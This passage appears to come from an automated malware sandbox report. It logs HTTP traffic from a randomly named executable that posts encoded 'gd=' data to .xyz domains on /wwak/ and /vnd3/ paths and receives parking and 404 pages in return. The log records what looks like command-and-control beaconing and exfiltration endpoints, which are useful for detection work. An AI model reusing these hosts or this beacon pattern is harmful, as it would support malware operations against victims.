                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                  set-cookie: parking_session=7b2e3516-2ff4-48b7-98a0-0e14c0bdab98; expires=Sat, 14 Sep 2024 09:27:34 GMT; path=/
                  connection: close
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:35.042124987 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2IyZTM1MTYtMmZmNC00OGI3LTk4YTAtMGUxNGMwYmRhYjk4IiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.449756199.59.243.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:37.130942106 CEST10904OUTPOST /wwak/ HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.personal-loans-jp8.xyz
                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 68 4f 6f 53 64 4d 4d 41 49 4e 68 63 77 38 58 4f 30 37 34 38 42 6c 36 76 37 71 68 42 6f 30 30 4b 5a 75 38 39 2f 65 44 43 64 32 61 33 39 55 59 58 41 57 53 33 30 63 71 51 2b 6f 4f 64 5a 72 38 6c 53 30 73 4f 54 43 54 6f 62 58 5a 52 33 4c 69 75 72 6e 36 43 48 70 72 65 77 4b 58 42 31 49 38 53 77 2f 41 42 4d 4d 6b 2b 4b 63 58 55 46 69 58 39 4c 7a 76 6c 70 61 68 53 53 50 70 65 71 35 39 6e 70 46 4c 43 75 45 4b 6d 79 69 43 6b 67 43 4a 50 41 73 77 4c 70 64 48 62 69 47 39 56 4e 34 6f 46 34 6f 56 44 59 69 68 6b 71 41 4b 42 74 4f 56 58 65 64 71 4b 4f 51 43 2f 43 7a 2b 6d 67 43 71 52 6f 70 31 33 48 55 31 62 45 75 62 43 67 38 73 7a 43 6e 48 31 6a 54 53 68 6b 58 36 58 42 58 45 4e 42 31 69 63 6e 75 71 64 6d 6a 42 73 51 4d 76 42 50 65 53 59 6d 4a 34 76 42 47 58 68 57 77 33 77 57 7a 59 63 56 78 4e 4a 36 4e 41 6e 76 76 70 72 6e 4a 47 43 32 42 2f 2b 36 7a 48 66 52 68 50 72 4e 4b 6b 67 50 [TRUNCATED]
                  Data Ascii: gd=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3xhOoSdMMAINhcw8XO0748Bl6v7qhBo00KZu89/eDCd2a39UYXAWS30cqQ+oOdZr8lS0sOTCTobXZR3Liurn6CHprewKXB1I8Sw/ABMMk+KcXUFiX9LzvlpahSSPpeq59npFLCuEKmyiCkgCJPAswLpdHbiG9VN4oF4oVDYihkqAKBtOVXedqKOQC/Cz+mgCqRop13HU1bEubCg8szCnH1jTShkX6XBXENB1icnuqdmjBsQMvBPeSYmJ4vBGXhWw3wWzYcVxNJ6NAnvvprnJGC2B/+6zHfRhPrNKkgPnxyiDoxfRHCEgh4YaGNN3saLBCntIFFKRu6FEFgQqdp04w7AIx8SOjYFTOokPb+YIVcRIBCXrn1JnsF4l3hlVEUTUL7TEVOhApUD7CLQOz8WF1ae3OBVYgFpU3L69eciLJzJh3jTGRTezSb34RutOktsr2BTrMgo+6UJ2ILZccMa2EVZ7xx5GyA8PyUS0fmx49jsP7npN0kD3l+nzQbr7c/xqFVgHhyA5+iMj3tWAIaCTPvzkO9ftm7BiiWqGt+34Jcpm6VJxAySricaWMAFi8GDZ/TegRmK0Ro4R5pA/Gf2vSiDh/sODx+nvsnlNxn2YZFVTjcJoTIxzTqVQaLddZOnB4UmHDzug8WnRXmCLRmR9yQV25qIanTPFZRU265NocdEHIhn9HNz7FcdKyu/JYizDCg9Ht1Wy6flVVK7Yddy5MFSVuXkp6IRvSSc1NGsdsK7zVVtii6wouGrJhuqWrTwGd7OWjegc0gZf15Vw40eBpBZaO++a6X0YWiMXWwSiHoc8yM6/Z1rdCLBE1I79ogoZrqUAHcU/K5Bq/UBkTfBvelZWcIE5ep15F8JpjHXm7OiGk7IbsCaFb0Si/kKJ6pmErTJlRDslBwn9MBIJZ2sdUm1HRDOsbsCguByWGDyCwy512f6zHXlyiLUiJPMbC8FsvLzKZ4CHR [TRUNCATED]
                  Sep 14, 2024 11:12:37.821768999 CEST1236INHTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:37 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1154
                  x-request-id: 81a2126a-1501-4e07-b5d7-19b0cb44ef59
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                  set-cookie: parking_session=81a2126a-1501-4e07-b5d7-19b0cb44ef59; expires=Sat, 14 Sep 2024 09:27:37 GMT; path=/
                  connection: close
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:37.821868896 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODFhMjEyNmEtMTUwMS00ZTA3LWI1ZDctMTliMGNiNDRlZjU5IiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.449757199.59.243.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:39.676362038 CEST520OUTGET /wwak/?gd=E3TGpDthwwVtcd68e7GptjCB6e8kOO0p076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUcyNJNhtpQgsemRCiUIU53imXlsG7IfaIBm8=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:40.145515919 CEST1236INHTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:39 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1478
                  x-request-id: 9be63c29-bc53-40fa-a0e4-115a84173c2d
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xzwwRlcqtnIywmh0RsYDEtl3hTxXxXs54SBAJojpYZ7TRSYT+g8jCrus5OE5434WVHauz09li8JU+BOYnwPmjg==
                  set-cookie: parking_session=9be63c29-bc53-40fa-a0e4-115a84173c2d; expires=Sat, 14 Sep 2024 09:27:40 GMT; path=/
                  connection: close
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 78 7a 77 77 52 6c 63 71 74 6e 49 79 77 6d 68 30 52 73 59 44 45 74 6c 33 68 54 78 58 78 58 73 35 34 53 42 41 4a 6f 6a 70 59 5a 37 54 52 53 59 54 2b 67 38 6a 43 72 75 73 35 4f 45 35 34 33 34 57 56 48 61 75 7a 30 39 6c 69 38 4a 55 2b 42 4f 59 6e 77 50 6d 6a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xzwwRlcqtnIywmh0RsYDEtl3hTxXxXs54SBAJojpYZ7TRSYT+g8jCrus5OE5434WVHauz09li8JU+BOYnwPmjg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:40.145533085 CEST931INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWJlNjNjMjktYmM1My00MGZhLWEwZTQtMTE1YTg0MTczYzJkIiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.449758162.0.239.141803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:45.226059914 CEST784OUTPOST /vnd3/ HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.quantumnests.xyz
                  Referer: http://www.quantumnests.xyz/vnd3/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 38 61 70 48 36 47 76 48 6c 49 67 68 38 68 6f 55 47 31 65 7a 31 38 39 6a 36 4a 6c 6c 72 76 6e 4d 79 48 54 4e 71 35 58 44 69 67 5a 43 56 44 4b 67 6e 66 63 78 46 78 43 7a 33 48 33 57 37 32 79 4b 45 51 6b 59 39 62 58 6b 35 30 57 69 2f 79 4a 43 56 71 31 66 51 31 68 54 6f 34 52 72 43 30 70 58 44 74 66 64 64 68 4a 45 4f 50 4d 42 69 6f 42 52 6d 53 2b 32 51 4f 64 38 2b 38 6d 37 53 32 73 42 31 47 7a 61 59 30 78 75 59 6c 6b 44 4e 59 6e 41 7a 73 72 44 2f 55 6d 52 54 53 75 55 58 6b 6f 44 63 2b 57 4d 72 33 46 35 41 70 64 51 32 61 6d 77 67 4c 59 39 4e 70 32 57 31 58 41 6a 2b 2f 6b 6d 38 77 3d 3d
                  Data Ascii: gd=8apH6GvHlIgh8hoUG1ez189j6JllrvnMyHTNq5XDigZCVDKgnfcxFxCz3H3W72yKEQkY9bXk50Wi/yJCVq1fQ1hTo4RrC0pXDtfddhJEOPMBioBRmS+2QOd8+8m7S2sB1GzaY0xuYlkDNYnAzsrD/UmRTSuUXkoDc+WMr3F5ApdQ2amwgLY9Np2W1XAj+/km8w==
                  Sep 14, 2024 11:12:45.819773912 CEST1236INHTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:45 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                  Sep 14, 2024 11:12:45.819793940 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                  Sep 14, 2024 11:12:45.819804907 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                  Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                  Sep 14, 2024 11:12:45.819860935 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                  Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                  Sep 14, 2024 11:12:45.819874048 CEST896INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                  Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                  Sep 14, 2024 11:12:45.819885015 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                  Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                  Sep 14, 2024 11:12:45.819896936 CEST1236INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                  Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/> <path class="s
                  Sep 14, 2024 11:12:45.819909096 CEST448INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                  Data Ascii: h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h-3l-6.8 25.2h3z
                  Sep 14, 2024 11:12:45.819920063 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                  Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                  Sep 14, 2024 11:12:45.819931030 CEST1236INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                  Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-
